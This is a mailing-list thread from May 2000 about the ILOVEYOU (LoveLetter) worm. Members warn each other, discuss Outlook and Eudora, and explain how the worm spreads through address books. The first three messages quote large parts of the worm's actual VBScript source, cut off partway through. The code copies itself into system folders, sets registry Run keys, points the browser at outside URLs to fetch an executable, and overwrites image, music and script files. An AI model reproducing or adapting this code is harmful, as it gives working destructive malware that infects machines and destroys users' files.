Re: ILOVEYOU

2000-05-04 Thread Dave Hannum 

This is the third time I've been sent this virus today - all by different people


=
"Always Drink Upstream From The Herd!"

David Hannum
Web Analyst/Programmer
Ohio University
[EMAIL PROTECTED]
(740) 597-2524



- Original Message -
From: Frank Kowalewicz <[EMAIL PROTECTED]>
To: Cold Fusion <[EMAIL PROTECTED]>
Sent: Thursday, May 04, 2000 8:24 AM
Subject: ILOVEYOU


This is a multi-part message in MIME format.

--=_NextPart_000_0038_01BFB5AA.7BC26B30
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit


kindly check the attached LOVELETTER coming from me.
--=_NextPart_000_0038_01BFB5AA.7BC26B30
Content-Type: application/octet-stream;
name="LOVE-LETTER-FOR-YOU.TXT.vbs"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="LOVE-LETTER-FOR-YOU.TXT.vbs"

rem  barok -loveletter(vbe) 
rem by: spyder  /  [EMAIL PROTECTED]  /  @GRAMMERSoft Group  /  =
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=3D""
ctr=3D0
Set fso =3D CreateObject("Scripting.FileSystemObject")
set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=3Dfile.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=3DCreateObject("WScript.Shell")
rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
Scripting Host\Settings\Timeout")
if (rr>=3D1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin =3D fso.GetSpecialFolder(0)
Set dirsystem =3D fso.GetSpecialFolder(1)
Set dirtemp =3D fso.GetSpecialFolder(2)
Set c =3D fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne=
l32",dirsystem&"\MSKernel32.vbs"
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=3D""
downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Download Directory")
if (downread=3D"") then
downread=3D"c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
Randomize
num =3D Int((4 * Rnd) + 1)
if num =3D 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmh=
Pnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num =3D 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwe=
rWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num =3D 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQ=
ZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num =3D 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDG=
jkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B=
UGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
regcreate =
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUG=
SFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc =3D fso.Drives
For Each d in dc
If d.DriveType =3D 2 or d.DriveType=3D3 Then
folderlist(d.path&"\")
end if
Next
listadriv =3D s
end sub
sub infectfiles(folderspec) =20
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f =3D fso.GetFolder(folderspec)
set fc =3D f.Files
for each f1 in fc
ext=3Dfso.GetExtensionName(f1.path)
ext=3Dlcase(ext)
s=3Dlcase(f1.name)
if (ext=3D"vbs") or (ext=3D"vbe") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") or =
(ext=3D"sct") or (ext=3D"hta") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=3Dfso.GetBaseName(f1.path)
set cop=3Dfso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext=3D"jpg") or (ext=3D"jpeg") then
set ap=3Dfso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=3Dfso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext=3D"mp3") or (ext=3D"mp2") then
set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=3Dfso.GetFile(f1.path)
att.attributes=3Datt.attributes+2
end if
if (eq<>folderspec) then
if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
(s=3D"script.ini") or (s=3D"mirc.hlp") then
set scriptini=3Dfso.CreateTextFile(folderspec&"\script.i

Re: ILOVEYOU

2000-05-04 Thread Wim Dewijngaert 

WOW!! Are we lucky that the cftalk list does not allow attachments anymore!
This is the famous ILOVEYOU virus!

Wim

- Original Message -
From: "Frank Kowalewicz" <[EMAIL PROTECTED]>
To: "Cold Fusion" <[EMAIL PROTECTED]>
Sent: Thursday, May 04, 2000 3:24 PM
Subject: ILOVEYOU


> This is a multi-part message in MIME format.
>
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
>
>
> kindly check the attached LOVELETTER coming from me.
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: application/octet-stream;
> name="LOVE-LETTER-FOR-YOU.TXT.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
> filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
>
> rem  barok -loveletter(vbe) 
> rem by: spyder  /  [EMAIL PROTECTED]  /  @GRAMMERSoft Group  /  =
> Manila,Philippines
> On Error Resume Next
> dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
> eq=3D""
> ctr=3D0
> Set fso =3D CreateObject("Scripting.FileSystemObject")
> set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
> vbscopy=3Dfile.ReadAll
> main()
> sub main()
> On Error Resume Next
> dim wscr,rr
> set wscr=3DCreateObject("WScript.Shell")
> rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
> Scripting Host\Settings\Timeout")
> if (rr>=3D1) then
> wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
> Host\Settings\Timeout",0,"REG_DWORD"
> end if
> Set dirwin =3D fso.GetSpecialFolder(0)
> Set dirsystem =3D fso.GetSpecialFolder(1)
> Set dirtemp =3D fso.GetSpecialFolder(2)
> Set c =3D fso.GetFile(WScript.ScriptFullName)
> c.Copy(dirsystem&"\MSKernel32.vbs")
> c.Copy(dirwin&"\Win32DLL.vbs")
> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> regruns()
> html()
> spreadtoemail()
> listadriv()
> end sub
> sub regruns()
> On Error Resume Next
> Dim num,downread
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne=
> l32",dirsystem&"\MSKernel32.vbs"
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
> \Win32DLL",dirwin&"\Win32DLL.vbs"
> downread=3D""
> downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
> Explorer\Download Directory")
> if (downread=3D"") then
> downread=3D"c:\"
> end if
> if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
> Randomize
> num =3D Int((4 * Rnd) + 1)
> if num =3D 1 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmh=
> Pnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
> elseif num =3D 2 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwe=
> rWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
> elseif num =3D 3 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQ=
> ZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
> elseif num =3D 4 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDG=
> jkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B=
> UGSFIX.exe"
> end if
> end if
> if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUG=
> SFIX",downread&"\WIN-BUGSFIX.exe"
> regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
> Explorer\Main\Start Page","about:blank"
> end if
> end sub
> sub listadriv
> On Error Resume Next
> Dim d,dc,s
> Set dc =3D fso.Drives
> For Each d in dc
> If d.DriveType =3D 2 or d.DriveType=3D3 Then
> folderlist(d.path&"\")
> end if
> Next
> listadriv =3D s
> end sub
> sub infectfiles(folderspec) =20
> On Error Resume Next
> dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
> set f =3D fso.GetFolder(folderspec)
> set fc =3D f.Files
> for each f1 in fc
> ext=3Dfso.GetExtensionName(f1.path)
> ext=3Dlcase(ext)
> s=3Dlcase(f1.name)
> if (ext=3D"vbs") or (ext=3D"vbe") then
> set ap=3Dfso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") or =
> (ext=3D"sct") or (ext=3D"hta") then
> set ap=3Dfso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> bname=3Dfso.GetBaseName(f1.path)
> set cop=3Dfso.GetFile(f1.path)
> cop.copy(folderspec&"\"&bname&".vbs")
> fso.DeleteFile(f1.path)
> elseif(ext=3D"jpg") or (ext=3D"jpeg") then
> set ap=3Dfso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> set cop=3Dfso.GetFile(f1.path)
> cop.copy(f1.path&".vbs")
> fso.DeleteFile(f1.path)
> elseif(ext=3D"mp3") or (ext=3D"mp2") then
> set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
> mp3.write vbscopy
> mp3.close
> set att=3Dfso.GetFile(f1.path)
> att.attributes=3Datt.attributes+2
> end if
> if (eq<>folderspec) then
> if (s=3D"mir

RE: ILOVEYOU

2000-05-04 Thread Kelly Matthews 

Every one this is a VISUAL BASIC VIRUS dont run it delete it Immediately.
Frank WHY did you send this??
Kelly

> -Original Message-
> From: Frank Kowalewicz [SMTP:[EMAIL PROTECTED]]
> Sent: Thursday, May 04, 2000 9:24 AM
> To:   Cold Fusion
> Subject:  ILOVEYOU
> 
> This is a multi-part message in MIME format.
> 
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: text/plain;
>   charset="iso-8859-1"
> Content-Transfer-Encoding: 7bit
> 
> 
> kindly check the attached LOVELETTER coming from me.
> --=_NextPart_000_0038_01BFB5AA.7BC26B30
> Content-Type: application/octet-stream;
>   name="LOVE-LETTER-FOR-YOU.TXT.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
>   filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
> 
> rem  barok -loveletter(vbe) 
> rem   by: spyder  /  [EMAIL PROTECTED]  /  @GRAMMERSoft
> Group  /  =
> Manila,Philippines
> On Error Resume Next
> dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
> eq=3D""
> ctr=3D0
> Set fso =3D CreateObject("Scripting.FileSystemObject")
> set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
> vbscopy=3Dfile.ReadAll
> main()
> sub main()
> On Error Resume Next
> dim wscr,rr
> set wscr=3DCreateObject("WScript.Shell")
> rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
> Scripting Host\Settings\Timeout")
> if (rr>=3D1) then
> wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
> Host\Settings\Timeout",0,"REG_DWORD"
> end if
> Set dirwin =3D fso.GetSpecialFolder(0)
> Set dirsystem =3D fso.GetSpecialFolder(1)
> Set dirtemp =3D fso.GetSpecialFolder(2)
> Set c =3D fso.GetFile(WScript.ScriptFullName)
> c.Copy(dirsystem&"\MSKernel32.vbs")
> c.Copy(dirwin&"\Win32DLL.vbs")
> c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> regruns()
> html()
> spreadtoemail()
> listadriv()
> end sub
> sub regruns()
> On Error Resume Next
> Dim num,downread
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne=
> l32",dirsystem&"\MSKernel32.vbs"
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
> \Win32DLL",dirwin&"\Win32DLL.vbs"
> downread=3D""
> downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
> Explorer\Download Directory")
> if (downread=3D"") then
> downread=3D"c:\"
> end if
> if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
> Randomize
> num =3D Int((4 * Rnd) + 1)
> if num =3D 1 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmh=
> Pnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
> elseif num =3D 2 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwe=
> rWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
> elseif num =3D 3 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQ=
> ZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
> elseif num =3D 4 then
> regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDG=
> jkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B=
> UGSFIX.exe"
> end if
> end if
> if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
> regcreate =
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUG=
> SFIX",downread&"\WIN-BUGSFIX.exe"
> regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
> Explorer\Main\Start Page","about:blank"
> end if
> end sub
> sub listadriv
> On Error Resume Next
> Dim d,dc,s
> Set dc =3D fso.Drives
> For Each d in dc
> If d.DriveType =3D 2 or d.DriveType=3D3 Then
> folderlist(d.path&"\")
> end if
> Next
> listadriv =3D s
> end sub
> sub infectfiles(folderspec) =20
> On Error Resume Next
> dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
> set f =3D fso.GetFolder(folderspec)
> set fc =3D f.Files
> for each f1 in fc
> ext=3Dfso.GetExtensionName(f1.path)
> ext=3Dlcase(ext)
> s=3Dlcase(f1.name)
> if (ext=3D"vbs") or (ext=3D"vbe") then
> set ap=3Dfso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") or =
> (ext=3D"sct") or (ext=3D"hta") then
> set ap=3Dfso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> bname=3Dfso.GetBaseName(f1.path)
> set cop=3Dfso.GetFile(f1.path)
> cop.copy(folderspec&"\"&bname&".vbs")
> fso.DeleteFile(f1.path)
> elseif(ext=3D"jpg") or (ext=3D"jpeg") then
> set ap=3Dfso.OpenTextFile(f1.path,2,true)
> ap.write vbscopy
> ap.close
> set cop=3Dfso.GetFile(f1.path)
> cop.copy(f1.path&".vbs")
> fso.DeleteFile(f1.path)
> elseif(ext=3D"mp3") or (ext=3D"mp2") then
> set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
> mp3.write vbscopy
> mp3.close
> set att=3Dfso.GetFile(f1.path)
> att.attributes=3Datt.attributes+2
> end if
> if (eq

RE: ILOVEYOU

2000-05-04 Thread Paul Ihrig 

how do you turn off vbs in outlook.
the help is usless.


> -Original Message-
> From: Kelly Matthews [SMTP:[EMAIL PROTECTED]]
> Sent: Thursday, May 04, 2000 9:41 AM
> To:   '[EMAIL PROTECTED]'; '[EMAIL PROTECTED]';
> '[EMAIL PROTECTED]'
> Subject:  RE: ILOVEYOU
> 
> Every one this is a VISUAL BASIC VIRUS dont run it delete it Immediately.
> Frank WHY did you send this??
> Kelly
> 
> > -Original Message-
> > From:   Frank Kowalewicz [SMTP:[EMAIL PROTECTED]]
> > Sent:   Thursday, May 04, 2000 9:24 AM
> > To: Cold Fusion
> > Subject:ILOVEYOU
> > 
> > This is a multi-part message in MIME format.
> > 
> > --=_NextPart_000_0038_01BFB5AA.7BC26B30
> > Content-Type: text/plain;
> > charset="iso-8859-1"
> > Content-Transfer-Encoding: 7bit
> > 
> > 
> > kindly check the attached LOVELETTER coming from me.
> > --=_NextPart_000_0038_01BFB5AA.7BC26B30
> > Content-Type: application/octet-stream;
> > name="LOVE-LETTER-FOR-YOU.TXT.vbs"
> > Content-Transfer-Encoding: quoted-printable
> > Content-Disposition: attachment;
> > filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
> > 
> > rem  barok -loveletter(vbe) 
> > rem by: spyder  /  [EMAIL PROTECTED]  /
> @GRAMMERSoft
> > Group  /  =
> > Manila,Philippines
> > On Error Resume Next
> > dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
> > eq=3D""
> > ctr=3D0
> > Set fso =3D CreateObject("Scripting.FileSystemObject")
> > set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
> > vbscopy=3Dfile.ReadAll
> > main()
> > sub main()
> > On Error Resume Next
> > dim wscr,rr
> > set wscr=3DCreateObject("WScript.Shell")
> > rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
> > Scripting Host\Settings\Timeout")
> > if (rr>=3D1) then
> > wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
> > Host\Settings\Timeout",0,"REG_DWORD"
> > end if
> > Set dirwin =3D fso.GetSpecialFolder(0)
> > Set dirsystem =3D fso.GetSpecialFolder(1)
> > Set dirtemp =3D fso.GetSpecialFolder(2)
> > Set c =3D fso.GetFile(WScript.ScriptFullName)
> > c.Copy(dirsystem&"\MSKernel32.vbs")
> > c.Copy(dirwin&"\Win32DLL.vbs")
> > c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
> > regruns()
> > html()
> > spreadtoemail()
> > listadriv()
> > end sub
> > sub regruns()
> > On Error Resume Next
> > Dim num,downread
> > regcreate =
> >
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKerne=
> > l32",dirsystem&"\MSKernel32.vbs"
> > regcreate =
> >
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices=
> > \Win32DLL",dirwin&"\Win32DLL.vbs"
> > downread=3D""
> > downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
> > Explorer\Download Directory")
> > if (downread=3D"") then
> > downread=3D"c:\"
> > end if
> > if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
> > Randomize
> > num =3D Int((4 * Rnd) + 1)
> > if num =3D 1 then
> > regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> >
> Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmh=
> > Pnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
> > elseif num =3D 2 then
> > regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> >
> Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwe=
> > rWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
> > elseif num =3D 3 then
> > regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> >
> Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQ=
> > ZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
> > elseif num =3D 4 then
> > regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
> >
> Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDG=
> >
> jkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-B=
> > UGSFIX.exe"
> > end if
> > end if
> > if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
> > regcreate =
> >
> "HKEY_LOCAL_MACHINE\Software\Microsof

Re: ILOVEYOU

2000-05-04 Thread Larry W. Virden 

From: "Wim Dewijngaert" <[EMAIL PROTECTED]>

> WOW!! Are we lucky that the cftalk list does not allow attachments anymore!
> This is the famous ILOVEYOU virus!

This virus is shutting down email systems across Europe and the US.

However, how did it get here at least twice on this mailing list if,
as Win notes, attachements are not supposed to be available any longer?

P.S.  This "Love Bug" virus attaches itself even to JPG's, etc. - it
is quite nasty.  See

http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
-- 
Larry W. Virden 
http://www.purl.org/NET/lvirden/>
Unless explicitly stated to the contrary, nothing in this posting should 
be construed as representing my employer's opinions.
-><-
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Sharon DiOrio 

And people ask why I stick with Eudora.  Heh.

Sharon

At 10:05 AM 5/4/2000 -0400, Paul Ihrig wrote:
>how do you turn off vbs in outlook.
>the help is usless.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Oblio Leitch 

WooHooo   Viva Eudora

At 5/4/00 10:23 AM, you wrote:
>And people ask why I stick with Eudora.  Heh.
>
>Sharon

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Avi Flax 

I'm with y'all! Been using Eudora for years and I love it!

Avi

At 11:03 AM 5/4/00 , you wrote:
>WooHooo   Viva Eudora
>
>At 5/4/00 10:23 AM, you wrote:
> >And people ask why I stick with Eudora.  Heh.
> >
> >Sharon

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

Re: ILOVEYOU

2000-05-04 Thread Jennifer 

At 10:07 AM 5/4/00 -0400, you wrote:
>From: "Wim Dewijngaert" <[EMAIL PROTECTED]>
>
> > WOW!! Are we lucky that the cftalk list does not allow attachments anymore!
> > This is the famous ILOVEYOU virus!
>
>This virus is shutting down email systems across Europe and the US.
>
>However, how did it get here at least twice on this mailing list if,
>as Win notes, attachements are not supposed to be available any longer?

It's printing the contents of the attachment, which is different than 
sending it as an attachment.

But it would still make me feel much better about this (even though I use 
Eudora) if people would delete the contents of the virus when they reply to 
things like this. Like this nice person did. Thank you, Wim whose last name 
I have no hope of correctly pronouncing.

I realize that I'm paranoid, but at least it's with good reason... Oh wait.
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread paul smith 

I missed it.  Why?

best,  paul

PS> I use Eudora, too.  Love its new search capability.

At 11:12 AM 5/4/00 -0400, you wrote:
> >At 5/4/00 10:23 AM, you wrote:
> > >And people ask why I stick with Eudora.  Heh.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Paul Ihrig 

we are so HOsed
Network drives going down left and right.

pray my brothers, pray

> -Original Message-
> From: Sharon DiOrio [SMTP:[EMAIL PROTECTED]]
> Sent: Thursday, May 04, 2000 10:23 AM
> To:   [EMAIL PROTECTED]
> Subject:      RE: ILOVEYOU
> 
> And people ask why I stick with Eudora.  Heh.
> 
> Sharon
> 
> At 10:05 AM 5/4/2000 -0400, Paul Ihrig wrote:
> >how do you turn off vbs in outlook.
> >the help is usless.
> 
> --
> 
> Archives: http://www.eGroups.com/list/cf-talk
> To Unsubscribe visit
> http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or
> send a message to [EMAIL PROTECTED] with 'unsubscribe' in
> the body.
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Reuben King 

Um, you can still catch this trojan (its not a virus) using Eudora as 
well as any other mail program on Windoze.  The only benefit using 
Outlook gives the trojan is the ability to spread itself via your 
address book.

In <[EMAIL PROTECTED]>, Oblio Leitch 
([EMAIL PROTECTED]) in a fit of unbridled passion, wrote:
> WooHooo   Viva Eudora
> 
> At 5/4/00 10:23 AM, you wrote:
> >And people ask why I stick with Eudora.  Heh.
> >
> >Sharon
> 
> --
> Archives: http://www.eGroups.com/list/cf-talk
> To Unsubscribe visit 
>http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
>message to [EMAIL PROTECTED] with 'unsubscribe' in the body.
> 
--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

RE: ILOVEYOU

2000-05-04 Thread Reuben King 

In <[EMAIL PROTECTED]>, 
Kelly Matthews ([EMAIL PROTECTED]) in a fit of unbridled passion, 
wrote:
> Every one this is a VISUAL BASIC VIRUS dont run it delete it Immediately.
> Frank WHY did you send this??

He didn't send it on purpose.. CF-Talk was in his Outlook address book 
and so the trojan sent itself.

--
Archives: http://www.eGroups.com/list/cf-talk
To Unsubscribe visit 
http://www.houseoffusion.com/index.cfm?sidebar=lists&body=lists/cf_talk or send a 
message to [EMAIL PROTECTED] with 'unsubscribe' in the body.

Re: ILOVEYOU

2000-05-04 Thread Reuben King 

In <[EMAIL PROTECTED]>, Larry W. Virden ([EMAIL PROTECTED]) in a 
fit of unbridled passion, wrote:
> From: "Wim Dewijngaert" <[EMAIL PROTECTED]>
> 
> > WOW!! Are we lucky that the cftalk list does not allow attachments anymore!
> > This is the famous ILOVEYOU virus!
> 
> This virus is shutting down email systems across Europe and the US.
> 
> However, how did it get here at least twice on this mailing list if,
> as Win notes, attachements are not supposed to be available any longer?
> 
> P.S.  This "Love Bug" virus attaches itself even to JPG's, etc. - it
> is quite nasty.  See

It doesn't attach itself, it overwrites JPG's, MP3's, and a few other 
obscure file extensions.. Then it renames them to .vbs ..

Having an open-source trojan to study is interesting.  This programmer 
wasn't terribly clever and it is indeed rather disconcerting how 
